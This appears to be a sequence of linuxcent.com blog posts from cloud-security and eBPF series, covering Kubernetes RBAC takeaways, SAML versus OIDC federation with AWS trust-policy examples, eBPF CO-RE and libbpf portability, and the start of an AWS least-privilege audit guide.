SOC 2 CC6.1 Kubernetes RBAC is the access control mechanism for the container platform layer in CC6.1
SOC 2 CC6.3 Binding revocation, SA token disabling, and OIDC group-based access removal satisfy CC6.3 requirements

Key Takeaways

  • Kubernetes RBAC and cloud IAM are separate authorization layers — both must be secured; strong cloud IAM with weak K8s RBAC is still a vulnerable cluster
  • cluster-admin bindings are the first thing to audit in any cluster — the blast radius of a compromised pod with cluster-admin is the entire cluster
  • Disable automountServiceAccountToken on service accounts and pods that don’t call the Kubernetes API — most application pods don’t need it
  • Use OIDC for human access rather than client certificates; revocation via IdP is instant and reliable
  • Bind groups from IdP rather than individual usernames; revocation propagates automatically when someone leaves
  • A service account that can create pods or create rolebindings is a privilege escalation path — audit for these in every namespace

What’s Next

EP12 is the capstone: Zero Trust IAM — how all the concepts in this series come together into an architecture that assumes nothing is implicitly trusted, verifies everything explicitly, and limits blast radius through least privilege enforced at every layer.

Next: Zero trust access in the cloud

Get EP12 in your inbox when it publishes → linuxcent.com/subscribe

SAML vs OIDC: Which Federation Protocol Belongs in Your Cloud?

Reading Time: 10 minutes

Meta Description: Choose between SAML vs OIDC federation for your cloud — understand token formats, trust flows, and which protocol fits your IdP and workload mix.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege AuditSAML vs OIDC Federation


TL;DR

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t manage them independently
  • SAML is XML-based, browser-oriented, the enterprise standard; OIDC is JWT-based, API-native, the modern protocol for workload identity and consumer SSO
  • In OIDC trust policies, the sub condition is the security boundary — omitting it means any GitHub Actions workflow in any repository can assume your role
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but need correct configuration (especially aud)
  • The IdP is the trust anchor: compromise the IdP and every downstream system is compromised. Treat IdP admin access with the same controls as your most sensitive system.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

The Big Picture

  FEDERATION: HOW TRUST FLOWS FROM IdP TO DOWNSTREAM SYSTEMS

  Identity Provider  (Okta / Entra ID / Google / AD FS)
  ┌──────────────────────────────────────────────────────────────────┐
  │  User or workload authenticates → IdP issues signed assertion   │
  │                                                                  │
  │  ┌──────────────────────────┐  ┌───────────────────────────┐   │
  │  │  SAML Assertion (XML)    │  │  OIDC ID Token (JWT)       │   │
  │  │  RSA-signed, 5–10 min    │  │  RS256-signed, ~1 hr      │   │
  │  │  Audience: SP entity ID  │  │  aud: client ID           │   │
  │  │  Subject: user identity  │  │  sub: specific workload   │   │
  │  └───────────┬──────────────┘  └──────────┬────────────────┘   │
  └─────────────────────────────────────────────────────────────────┘
                 │  human SSO                  │  workload identity
                 ▼                             ▼
  ┌─────────────────────────┐  ┌───────────────────────────────────┐
  │ SP validates signature  │  │ AWS STS / GCP STS validates       │
  │ + audience + timestamp  │  │ signature + iss + aud + sub       │
  │ → console session       │  │ → AssumeRoleWithWebIdentity       │
  └─────────────────────────┘  └───────────────────────────────────┘

  Security bound: IdP security bounds every system that trusts it
  Disable in Okta → access revoked everywhere that trusts Okta

Introduction

Before federation existed, every system had its own user database. Your Jira account. Your AWS account. Your Salesforce account. Your internal wiki. Each one had its own password, its own MFA, its own offboarding process. When an engineer joined, someone had to create accounts in every system. When they left, you hoped whoever processed the offboarding remembered to deactivate all of them.

I’ve done that audit — the one where you’re trying to figure out if a former employee still has access to anything. You go system by system, cross-reference against HR records, find accounts that exist in places you’ve forgotten the company even uses. In one environment I found an ex-engineer’s account still active in a vendor portal six months after they left, because that system was set up by someone who had since also left the company, and nobody had documented it.

Federation solves this structurally. One identity provider. One place to authenticate. One place to revoke. Every downstream system trusts the IdP’s assertion rather than managing credentials independently. Disable someone in Okta and they lose access everywhere that trusts Okta — immediately, without a checklist.

This episode is how federation actually works at the protocol level, because understanding the mechanism is what lets you design it securely. A federation setup with a trust policy that accepts assertions from any OIDC issuer is worse than no federation — it’s a false sense of security.


The Federation Model

Identity Provider (IdP)          Service Provider (SP) / Relying Party
  (Okta, Google, AD FS, Entra ID)       (AWS, Salesforce, GitHub, your app)
         │                                          │
         │  1. User authenticates to IdP             │
         │     (password + MFA)                      │
         │                                          │
         │  2. IdP generates a signed assertion      │
         │     (SAML response or OIDC ID Token)      │
         │ ──────────────────────────────────────── ▶│
         │                                          │
         │  3. SP validates the signature            │
         │     (using IdP's public certificate       │
         │      or JWKS endpoint)                    │
         │  4. SP maps identity to local permissions │
         │  5. SP grants access                      │

The SP never sees the user’s password. It never has one. It trusts the IdP’s cryptographic signature — if the assertion is signed with the IdP’s private key, and the SP trusts that key, the identity is accepted.

This trust chain has one critical property: the security of every SP is bounded by the security of the IdP. Compromise the IdP, and every system that trusts it is compromised. This is why IdP security deserves the same attention as the most sensitive system it gates access to.


SAML 2.0 — The Enterprise Standard

SAML (Security Assertion Markup Language) is XML-based, verbose, and battle-tested. Published in 2005, it’s the protocol behind most enterprise SSO deployments. When your company says “use your corporate login for this vendor app,” SAML is usually the mechanism.

How a SAML Login Flows

1. User visits AWS console (the Service Provider)
2. AWS checks: no active session → redirect to IdP
   → https://company.okta.com/saml?SAMLRequest=...
3. Okta authenticates the user (password, MFA)
4. Okta generates a SAML Assertion — a signed XML document containing:
   - Who the user is (Subject, typically email)
   - Their attributes (group memberships, custom attributes)
   - When the assertion was issued and when it expires (valid 5-10 minutes typically)
   - Which SP this is for (Audience restriction)
   - Okta's digital signature (RSA-SHA256 or similar)
5. Browser POSTs the assertion to AWS's ACS (Assertion Consumer Service) URL
6. AWS validates the signature against Okta's public cert (retrieved from Okta's metadata URL)
7. AWS reads the SAML attribute for the IAM role
8. AWS calls sts:AssumeRoleWithSAML → issues temporary credentials
9. User gets a console session — no AWS credentials were ever stored anywhere

What a SAML Assertion Actually Looks Like

<saml:Assertion>
  <saml:Issuer>https://okta.company.com</saml:Issuer>

  <saml:Subject>
    <saml:NameID>[email protected]</saml:NameID>
  </saml:Subject>

  <saml:AttributeStatement>
    <!-- This attribute tells AWS which IAM role to assume -->
    <saml:Attribute Name="https://aws.amazon.com/SAML/Attributes/Role">
      <saml:AttributeValue>
        arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider
      </saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>

  <!-- Critical: time bounds on this assertion -->
  <saml:Conditions NotBefore="2026-04-11T09:00:00Z" NotOnOrAfter="2026-04-11T09:05:00Z">
    <saml:AudienceRestriction>
      <!-- Critical: this assertion is ONLY valid for AWS -->
      <saml:Audience>https://signin.aws.amazon.com/saml</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>

  <ds:Signature>... RSA-SHA256 signature over the above ...</ds:Signature>
</saml:Assertion>

The Audience restriction and the NotOnOrAfter timestamp are two of the most security-critical fields. The audience ensures this assertion can’t be reused for a different SP. The timestamp ensures it can’t be replayed after expiry.

Setting Up SAML Federation with AWS

# Register Okta as a SAML provider in AWS IAM
aws iam create-saml-provider \
  --saml-metadata-document file://okta-metadata.xml \
  --name OktaProvider

# Create the IAM role that federated users will assume
aws iam create-role \
  --role-name EngineerRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:saml-provider/OktaProvider"
      },
      "Action": "sts:AssumeRoleWithSAML",
      "Condition": {
        "StringEquals": {
          "SAML:aud": "https://signin.aws.amazon.com/saml"
        }
      }
    }]
  }'

# In Okta: configure the AWS IAM Identity Center app
# Attribute mapping: https://aws.amazon.com/SAML/Attributes/Role
# Value: arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider

# Set maximum session duration (8 hours is reasonable for human access)
aws iam update-role \
  --role-name EngineerRole \
  --max-session-duration 28800

SAML Attack Surface

Attack What It Does Why It Works Prevention
XML Signature Wrapping (XSW) Attacker inserts a malicious assertion, wraps it around the legitimate signed one; some SPs validate the wrong element SAML’s XML structure is complex; naive signature validation checks the signed element, not the element the SP reads Use a vetted SAML library — never hand-roll parsing
Assertion replay Steal a valid assertion (e.g., via network intercept) and replay it before NotOnOrAfter If the SP doesn’t track used assertion IDs, the same assertion can be used multiple times Short expiry; SP tracks seen assertion IDs
Audience bypass SP doesn’t verify the Audience field An assertion issued for SP A can be used at SP B Always validate Audience matches your SP entity ID

XML Signature Wrapping is the most interesting attack historically — it was how security researchers demonstrated SAML implementations in AWS, Google, and others could be bypassed before vendors patched their libraries. The lesson: SAML is complex enough that rolling your own parser is asking for a vulnerability.


OpenID Connect (OIDC) — The Modern Protocol

OIDC is JSON-based, REST-native, and designed for the web and API-first world. Built on top of OAuth 2.0, it’s the protocol behind “Sign in with Google,” GitHub’s OIDC tokens for Actions, and workload identity federation across cloud providers.

Token Anatomy

An OIDC ID Token is a JWT — three base64-encoded parts separated by dots:

Header.Payload.Signature

Header:
{
  "alg": "RS256",           ← signing algorithm
  "kid": "key-id-123"       ← which key signed this (for JWKS rotation)
}

Payload (the claims):
{
  "iss": "https://accounts.google.com",         ← who issued this token
  "sub": "108378629573454321234",               ← stable user identifier (not email)
  "aud": "my-app-client-id",                   ← who this token is for
  "exp": 1749600000,                           ← expires at (Unix timestamp)
  "iat": 1749596400,                           ← issued at
  "email": "[email protected]",
  "email_verified": true,
  "hd": "company.com"                          ← hosted domain (Google Workspace)
}

Signature: RSA-SHA256(base64(header) + "." + base64(payload), idp_private_key)

The relying party (your application, or AWS STS) validates the signature using the IdP’s public keys — available at the JWKS endpoint (/.well-known/jwks.json). The signature verification proves the token was issued by the expected IdP and hasn’t been tampered with since.

The Full OIDC Token Exchange (GitHub Actions → AWS)

# GitHub Actions automatically provides an OIDC token in the runner environment
# The token contains: iss=token.actions.githubusercontent.com, repo, ref, sha, run_id, etc.

# Step 1: Fetch the OIDC token from GitHub's token service
TOKEN=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
  "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" | jq -r '.value')

# Step 2: Present to AWS STS for exchange
aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::123456789012:role/GitHubActionsRole \
  --role-session-name github-deploy \
  --web-identity-token "${TOKEN}"

# STS performs these validations:
# 1. Fetch GitHub's JWKS: https://token.actions.githubusercontent.com/.well-known/jwks
# 2. Verify signature is valid
# 3. Verify iss = "token.actions.githubusercontent.com" (matches OIDC provider)
# 4. Verify aud = "sts.amazonaws.com"
# 5. Verify sub matches the trust policy condition
# 6. Verify exp is in the future

The trust policy condition on the IAM role is what prevents any GitHub repository from assuming this role:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
        "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main"
      }
    }
  }]
}

The sub condition is the security boundary. repo:my-org/my-repo:ref:refs/heads/main means: only runs triggered from the main branch of my-org/my-repo can assume this role. A pull request from a fork, a run from a different repo, or a run from a different branch — all get a different sub claim and the assumption fails.

I’ve reviewed trust policies that omit the sub condition and just check aud. That means any GitHub Actions workflow — in any repository, owned by anyone — can assume that role. That’s not a misconfiguration to be theoretical about: public GitHub repositories exist, and they can trigger GitHub Actions.

OIDC Validation Checklist

Every application that validates OIDC tokens must check all of these:

✓ Signature valid (using IdP's JWKS endpoint — not a hardcoded key)
✓ iss matches the expected IdP URL
✓ aud matches your application's client ID (not just "any audience")
✓ exp is in the future
✓ nbf (not before), if present, is in the past
✓ iat is recent (within your clock skew tolerance)
✓ For workload identity: sub is pinned to the specific workload

Skipping aud validation is the most common mistake. A token issued for application A with aud: app-a-client-id should not be accepted by application B. Without audience validation, any application in your system that can obtain a token for the IdP can reuse it at any other application. Libraries like python-jose and jsonwebtoken validate aud by default — but they need to be configured with the expected audience value.


Enterprise Federation Patterns

Multi-Account AWS with IAM Identity Center + Okta

The pattern I deploy in every multi-account AWS environment:

Okta (IdP)
  └── IAM Identity Center
        ├── Account: prod     → Permission Sets: ReadOnly, DevOps
        ├── Account: staging  → Permission Sets: Developer  
        ├── Account: shared   → Permission Sets: NetworkAdmin, SecurityAudit
        └── Account: sandbox  → Permission Sets: Admin (sandbox only)
# Engineers access accounts through Identity Center portal
aws configure sso
# Prompts: SSO start URL, region, account, role

aws sso login --profile prod-readonly

# List available accounts and roles (useful for tooling and scripts)
aws sso list-accounts --access-token "${TOKEN}"
aws sso list-account-roles --access-token "${TOKEN}" --account-id "${ACCOUNT_ID}"

# Get temporary credentials for a specific account/role
aws sso get-role-credentials \
  --account-id "${ACCOUNT_ID}" \
  --role-name ReadOnly \
  --access-token "${TOKEN}"

When an engineer is offboarded from Okta, they lose access to every AWS account immediately. No individual IAM user deletion across 20 accounts. No access key hunting. One action in Okta, complete revocation.

Just-in-Time (JIT) Provisioning

Rather than creating user accounts in every downstream system ahead of time, JIT provisioning creates accounts on first login:

  1. User authenticates to IdP
  2. SAML/OIDC assertion includes group memberships and attributes
  3. SP receives assertion, checks if a user account exists for this sub
  4. If not: create the account with attributes from the assertion
  5. Grant access based on group claims
  6. On subsequent logins: update the account’s attributes if claims changed

The security property: when a user is disabled in the IdP, their account in downstream systems becomes inaccessible even if the account object still exists. There’s nothing to log in with. JIT accounts don’t survive IdP deletion — they’re inactive shells that produce no risk.


The IdP Is the Trust Anchor — Protect It Accordingly

The entire security of a federated system is bounded by the security of the IdP. If an attacker can log into Okta as an admin, they can issue valid SAML assertions for any user, for any role, to any SP that trusts Okta. Every downstream system is compromised simultaneously.

This is not theoretical. In the 2023 Caesars and MGM Resorts attacks, initial access was achieved through social engineering against identity provider support — not through technical exploitation of cloud infrastructure. Once identity infrastructure is compromised, everything downstream follows.

What this means practically:

  • MFA for all IdP admin accounts — hardware FIDO2 keys, not TOTP. TOTP codes can be phished in real-time. Hardware keys cannot.
  • PIM / JIT access for IdP configuration changes — no standing admin access
  • Separate monitoring and alerting for IdP admin activity
  • Audit who can modify SAML/OIDC configurations and attribute mappings in the IdP — these are the levers for privilege escalation
  • Narrow audience restrictions — configure which SPs can receive assertions; don’t create a wildcard IdP configuration that serves all SPs

Conditional Access — Adding Context to Federation

Modern IdPs support Conditional Access policies that restrict when assertions are issued:

// Entra ID Conditional Access: require MFA + compliant device for AWS access
{
  "conditions": {
    "applications": {
      "includeApplications": ["AWS-Application-ID-in-Entra"]
    },
    "users": {
      "includeGroups": ["all-employees"]
    },
    "locations": {
      "excludeLocations": ["NamedLocation-CorporateNetwork"]
    }
  },
  "grantControls": {
    "operator": "AND",
    "builtInControls": ["mfa", "compliantDevice"]
  }
}

This policy: when an employee accesses AWS from outside the corporate network, they must use MFA on a device that MDM has verified as compliant. From inside the network, the policy still applies but the named location exclusion can relax certain requirements.

Conditional Access is how you move beyond “authenticated to IdP” as the only gate. Device health, network location, risk score — these become inputs to the access decision.


Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management Federation is the mechanism for extending identity trust across organizational boundaries
CISSP Domain 3 — Security Architecture Trust relationships must be explicitly designed; overly broad federation trust is an architectural failure
ISO 27001:2022 5.19 Information security in supplier relationships Federation with third-party IdPs and SPs establishes a cross-organizational trust boundary that must be governed
ISO 27001:2022 8.5 Secure authentication SAML and OIDC are the secure authentication protocols for federated access — token validation requirements
ISO 27001:2022 5.17 Authentication information Credential lifecycle in federated systems — no passwords distributed to SPs; IdP manages authentication
SOC 2 CC6.1 Federated identity is the access control mechanism for human access to cloud environments in CC6.1
SOC 2 CC6.6 Logical access from outside system boundaries — federation with external IdPs and partner organizations

Key Takeaways

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t need to manage them independently
  • SAML is XML-based, browser-oriented, widely supported for enterprise SSO; OIDC is JWT-based, API-friendly, the protocol for modern workload identity and consumer SSO
  • In OIDC, the sub condition in trust policies is what prevents any workload from assuming any role — omitting it is a critical misconfiguration
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but they need correct configuration
  • The IdP is the trust anchor — its security posture bounds the security of every system that trusts it. Treat IdP admin access with the same controls as your most sensitive systems.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

What’s Next

EP11 brings this into Kubernetes — RBAC, service account tokens, and how the Kubernetes authorization layer interacts with cloud IAM. Two separate systems, both requiring security. A gap in either becomes a gap in both.

Next: Kubernetes RBAC and AWS IAM

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

CO-RE and libbpf — Write Once, Run on Any Kernel

Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 6
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf**


TL;DR

  • Kernel structs change between releases — hardcoded offsets break across patch versions, not just major releases
  • BTF embeds full type information in the kernel at /sys/kernel/btf/vmlinux; CO-RE uses it to patch field accesses at load time
  • vmlinux.h, generated from BTF, replaces all kernel headers with a single file committed to your repository
  • BPF_CORE_READ() is the CO-RE macro — every kernel struct access in a portable program goes through it
  • libbpf skeleton generation (bpftool gen skeleton) eliminates manual fd management for map and program lifecycle
  • For production tools: libbpf + CO-RE. For one-off debugging: bpftrace. For prototyping: BCC.

eBPF CO-RE (Compile Once, Run Everywhere) solves the kernel portability problem — the reason Cilium and Falco survive kernel upgrades without recompilation. What maps assumed — quietly — is that the kernel structs those programs read look the same tomorrow as they do today. They don’t. The Linux kernel has no stable ABI for internal data structures. task_struct, sk_buff, sock — the fields eBPF programs read constantly — can shift between patch releases, not just major versions. I learned this the hard way when a routine upgrade from 5.15.0-89 to 5.15.0-91 — two patch revisions — silently broke a custom tracer I’d been running in production for six months.


Six months after deploying a custom eBPF tracer for a client — it detected specific syscall patterns that Falco’s default ruleset didn’t cover — they ran a routine Ubuntu patch upgrade. Not a major kernel version jump. 5.15.0-89 to 5.15.0-91. Two patch revisions.

The tracer stopped loading. The error was invalid indirect read from stack. I opened the program source: nothing remotely like an indirect read. The program was a straightforward tracepoint handler, maybe 40 lines of C.

Three hours of debugging led to a four-byte offset difference. The struct task_struct had a field alignment change between the two patch versions. My program accessed ->comm at a hardcoded byte offset. On 5.15.0-89 that offset was 0x620. On 5.15.0-91 it was 0x624. The verifier caught the misalignment — correctly — and rejected the program.

I had compiled the eBPF bytecode against a fixed kernel header snapshot. The binary was not portable. Every time the kernel moved a struct field, the tool broke.

CO-RE is the solution to this.

Why Kernel Structs Change and Why It Matters

The Linux kernel has no stable ABI for internal data structures. task_struct, sock, sk_buff, file — the structs that eBPF programs read constantly — change between releases. Field additions, reordering, alignment changes, struct embedding changes. The kernel developers are under no obligation to preserve internal layouts, and they don’t.

Before CO-RE, eBPF programs dealt with this in two ways:

BCC (BPF Compiler Collection) — compile the eBPF C code at runtime on the target host, using that system’s kernel headers. No portability problem because compilation happens on the machine you’re deploying to. Cost: you need a full compiler toolchain, kernel headers, and Python runtime on every production node. Startup time in seconds. Container image size in hundreds of MB. For a security tool that should be lightweight and fast-starting, this is a non-starter.

Per-kernel compiled binaries — ship different builds for each supported kernel version, detect at runtime, load the matching binary. Falco maintained this model for years. The operational overhead is significant: a matrix of kernel × distro × version with separate build and test pipelines for each combination.

CO-RE is the third option. Compile once on a build machine, and let libbpf patch struct field accesses at load time on the target system, using type information embedded in the running kernel.

BTF: The Type System That Makes CO-RE Possible

BTF (BPF Type Format) is compact type debug information embedded directly into the kernel image. Since Linux 5.2, kernels built with CONFIG_DEBUG_INFO_BTF=y expose their full type information at /sys/kernel/btf/vmlinux.

# Verify BTF is available
ls -la /sys/kernel/btf/vmlinux

# Inspect the BTF for a specific struct
bpftool btf dump file /sys/kernel/btf/vmlinux format raw | grep -A 5 'task_struct'

# See the actual field offsets the running kernel uses
bpftool btf dump file /sys/kernel/btf/vmlinux format c | grep -A 20 'struct task_struct {'

BTF encodes every struct definition with field names, types, and byte offsets. When libbpf loads an eBPF program compiled with CO-RE relocations, it reads both the BTF the program was compiled against (embedded in the .bpf.o file) and the BTF of the running kernel. If task_struct->comm has moved, libbpf patches the field access instruction before loading the program.

This patching happens at load time, transparently, without modifying the binary you shipped.

Most distribution kernels now ship with BTF enabled:

# Ubuntu 20.04+ (kernel 5.4+)
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y

# Check at runtime
file /sys/kernel/btf/vmlinux
# /sys/kernel/btf/vmlinux: symbolic link to /sys/kernel/btf/vmlinux

Amazon Linux 2023, Ubuntu 22.04, Debian 11+, RHEL 8.2+, and most cloud-provider-managed kernels have BTF. The notable exception: RHEL 7 and Amazon Linux 2 on older kernels.

The CO-RE Toolchain

The build pipeline for a CO-RE eBPF program:

Development machine:
  vmlinux.h (generated from kernel BTF)
       ↓
  myprog.bpf.c ──── clang -target bpf -g ────→ myprog.bpf.o
  (CO-RE relocations embedded in BTF section)
       ↓
  bpftool gen skeleton myprog.bpf.o ─────────→ myprog.skel.h
       ↓
  myprog.c (userspace) ── gcc ──→ myprog
  (statically links libbpf, skeleton handles load/attach/cleanup)

Target machine (any kernel with BTF, 5.4+):
  ./myprog
  ↓ libbpf reads /sys/kernel/btf/vmlinux
  ↓ patches field accesses to match current kernel struct layout
  ↓ verifier validates patched program
  ↓ program loads and runs

One binary. Any supported kernel. No compiler on the target system.

vmlinux.h — One Header to Replace Them All

Before CO-RE, eBPF C programs included dozens of kernel headers — linux/sched.h, linux/net.h, linux/fs.h, linux/socket.h — and they had to match the exact kernel version you were targeting.

vmlinux.h is generated from the BTF of a running kernel. It contains every struct, enum, typedef, and macro definition the kernel exposes through BTF — in a single file, without any compile-time kernel dependency.

# Generate vmlinux.h from the running kernel
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

# Typical size
wc -l vmlinux.h
# 350000+

You commit vmlinux.h to your repository, generated from a representative kernel. CO-RE handles the actual layout differences at load time on whatever kernel you deploy to. The file is large but you only generate it once and update it when you add support for a new kernel generation.

In your eBPF C source:

#include "vmlinux.h"           // replaces all kernel headers
#include <bpf/bpf_helpers.h>   // eBPF helper functions
#include <bpf/bpf_tracing.h>   // tracing macros
#include <bpf/bpf_core_read.h> // CO-RE read macros

How CO-RE Fixes the Offset Problem

The mechanism is worth understanding once, even if you’re not writing eBPF programs.

When a CO-RE eBPF program accesses a kernel struct field, it doesn’t hardcode the byte offset. Instead, it records a relocation — “I need the offset of pid inside task_struct” — in the compiled binary. When libbpf loads the program, it resolves each relocation by looking up the field in the running kernel’s BTF and patches the access instruction to use the correct offset for this specific kernel.

This is why my four-byte problem happened: the tracer I’d compiled wasn’t using CO-RE. It hardcoded 0x620 as the offset of task_struct->comm. When the kernel moved it to 0x624, the program accessed the wrong memory, the verifier caught the misalignment, and the load failed. A CO-RE rewrite would have resolved comm‘s offset at load time from BTF and never known the difference.

The relocation model also handles fields that don’t exist on older kernels. If a program accesses a field added in kernel 5.15 and the running kernel is 5.10, libbpf can either skip the access (returning a zero value) or fail the load — depending on how the program marks the field access. This is how tools ship support for features across a kernel version range without separate builds.

What CO-RE Means for Tools You Already Run

This is why you care about CO-RE even if you’re never going to write an eBPF program yourself.

Falco, Cilium, Tetragon, and Pixie all ship as single binaries or container images. You install them on a Ubuntu 22.04 node, a RHEL 9 node, and an Amazon Linux 2023 node — three different kernel versions, three different task_struct layouts — and the same binary works on all of them. Before CO-RE, Falco maintained pre-compiled kernel probes for every supported kernel version in a matrix of distro × kernel × version. The probe list had thousands of entries. A kernel your distro shipped between Falco release cycles meant a gap in coverage until the next release.

With CO-RE, there’s one binary. libbpf reads the running kernel’s BTF at load time, patches the field accesses to match the actual struct layout, and the verifier checks the patched program. The tool vendor doesn’t need to know about your specific kernel. You don’t need to wait for a probe release.

The constraint is BTF availability. Check your nodes:

# Quick check — if this file exists, CO-RE tools work
ls /sys/kernel/btf/vmlinux

# Full confirmation
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y  ← required

What you’ll find: Ubuntu 20.04+, Debian 11+, RHEL 8.2+, Amazon Linux 2023, and GKE/EKS managed nodes all have BTF. Amazon Linux 2 and RHEL 7 do not. If you’re running those, CO-RE-based tools fall back to the legacy BCC compilation path — which requires kernel headers installed on the node.

The One Thing to Run Right Now

This command shows you the exact struct layout your running kernel uses — the same layout libbpf reads when it patches CO-RE programs at load time:

# See how your kernel defines task_struct right now
bpftool btf dump file /sys/kernel/btf/vmlinux format c | grep -A 30 '^struct task_struct {'

The output is the canonical type information for your running kernel. Every field, every offset. When libbpf loads a CO-RE program, it’s reading this to figure out whether task_struct->comm is at offset 0x620 or 0x624.

You can also see specific struct sizes and verify that two kernels differ:

# On kernel A (5.15.0-89)
bpftool btf dump file /sys/kernel/btf/vmlinux format raw | grep -w "task_struct" | head -3

# On kernel B (5.15.0-91) — same command, different output if struct changed
# This is what broke my tracer: field offset changed across a two-patch jump

The practical use: when a CO-RE eBPF tool fails to load with a BTF error, this is where you look. The error tells you which struct field the relocation failed on. This command shows you the current layout. You can confirm whether the field exists, whether it moved, whether it was renamed.

BCC vs libbpf vs bpftrace

Three approaches to eBPF development, with distinct tradeoffs:

BCC libbpf + CO-RE bpftrace
Compilation Runtime on target host Build-time on dev machine Runtime (embedded LLVM)
Target deployment Compiler + headers on every node Single static binary bpftrace binary only
Portability Compile-on-target handles it CO-RE + BTF handles it Internal CO-RE support
Memory overhead High (Python + compiler: 200MB+) Low (few MB binary) Medium
Startup time Seconds (compilation) Milliseconds Seconds (JIT compile)
Best for Prototyping, development Production tools, shipped software Interactive debugging sessions
Language Python + C C (kernel) + C/Go/Rust (userspace) bpftrace scripting

For anything you’re shipping — an eBPF-based security tool, an observability agent, an open-source project — libbpf + CO-RE is the right choice. BCC is for prototyping before you commit to an implementation. bpftrace is for the 30-second debugging session on a live node.

The practical test: if you’re building something you’ll deploy as a container image or a package, it needs to be a self-contained binary with no build dependencies on the target system. That means libbpf.

Common Mistakes

Mistake Impact Fix
Direct struct dereference instead of BPF_CORE_READ Program breaks on any kernel struct change Use BPF_CORE_READ() for all kernel struct field access
Missing char LICENSE[] SEC("license") = "GPL" GPL-only helpers (most tracing helpers) unavailable Always include the license section
vmlinux.h generated on a very old kernel Missing structs added in newer kernel releases Regenerate from the highest kernel version you target
Forgetting -g flag in clang invocation No BTF debug info → no CO-RE relocations Always compile with -g -O2 -target bpf
Hardcoding struct offsets as integer constants Breaks silently on next kernel patch Use BTF-aware CO-RE macros exclusively

Key Takeaways

  • Kernel structs change between releases — hardcoded offsets break across patch versions, not just major releases
  • BTF embeds full type information in the kernel at /sys/kernel/btf/vmlinux; CO-RE uses it to patch field accesses at load time
  • vmlinux.h, generated from BTF, replaces all kernel headers with a single file committed to your repository
  • BPF_CORE_READ() is the CO-RE macro — every kernel struct access in a portable program goes through it
  • libbpf skeleton generation (bpftool gen skeleton) eliminates manual fd management for map and program lifecycle
  • For production tools: libbpf + CO-RE. For one-off debugging: bpftrace. For prototyping: BCC.

What’s Next

CO-RE makes eBPF programs portable across kernel versions. EP07 takes the next question: where in the kernel’s data path does it make sense to attach them?

XDP fires before the kernel has allocated a single byte of memory for an incoming packet — before the kernel even knows whether to accept it. That hook placement is why Cilium can do line-rate load balancing and why some network filtering rules that look correct in iptables do nothing against certain traffic. The rules weren’t wrong. The hook was in the wrong place.

Next: XDP — packets processed before the kernel knows they arrived

Get EP07 in your inbox when it publishes → linuxcent.com/subscribe

AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Reading Time: 10 minutes

Meta Description: Run an AWS least privilege audit using Access Analyzer — right-size IAM policies from wildcard permissions to scoped, production-safe roles.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege Audit


TL;DR

  • The average IAM entity uses less than 5% of its granted permissions — the 95% excess is attack surface, not waste
  • AWS Access Analyzer generates a least-privilege policy from 90 days of CloudTrail data — use it on every Lambda role, ECS task role, and EC2 instance profile
  • GCP IAM Recommender surfaces specific right-sizing suggestions based on 90-day activity and tracks them until you act on them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build aws accessanalyzer validate-policy into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

The Big Picture

  THE LEAST PRIVILEGE AUDIT CYCLE

  ┌─────────────────────────────────────────────────────────────────┐
  │  1. INVENTORY  What identities exist, what policies attached?  │
  │  aws iam get-account-authorization-details                      │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  2. CLASSIFY  Group by purpose: human / CI-CD / app / data     │
  │  Expected permission profile per class — deviations are findings│
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  3. FIND UNUSED  Granted vs Used gap (average: 95% excess)     │
  │  AWS: Access Analyzer generated policy + last-accessed data     │
  │  GCP: IAM Recommender  │  Azure: Defender + Access Reviews     │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  4. RIGHT-SIZE  Replace wildcards with scoped permissions       │
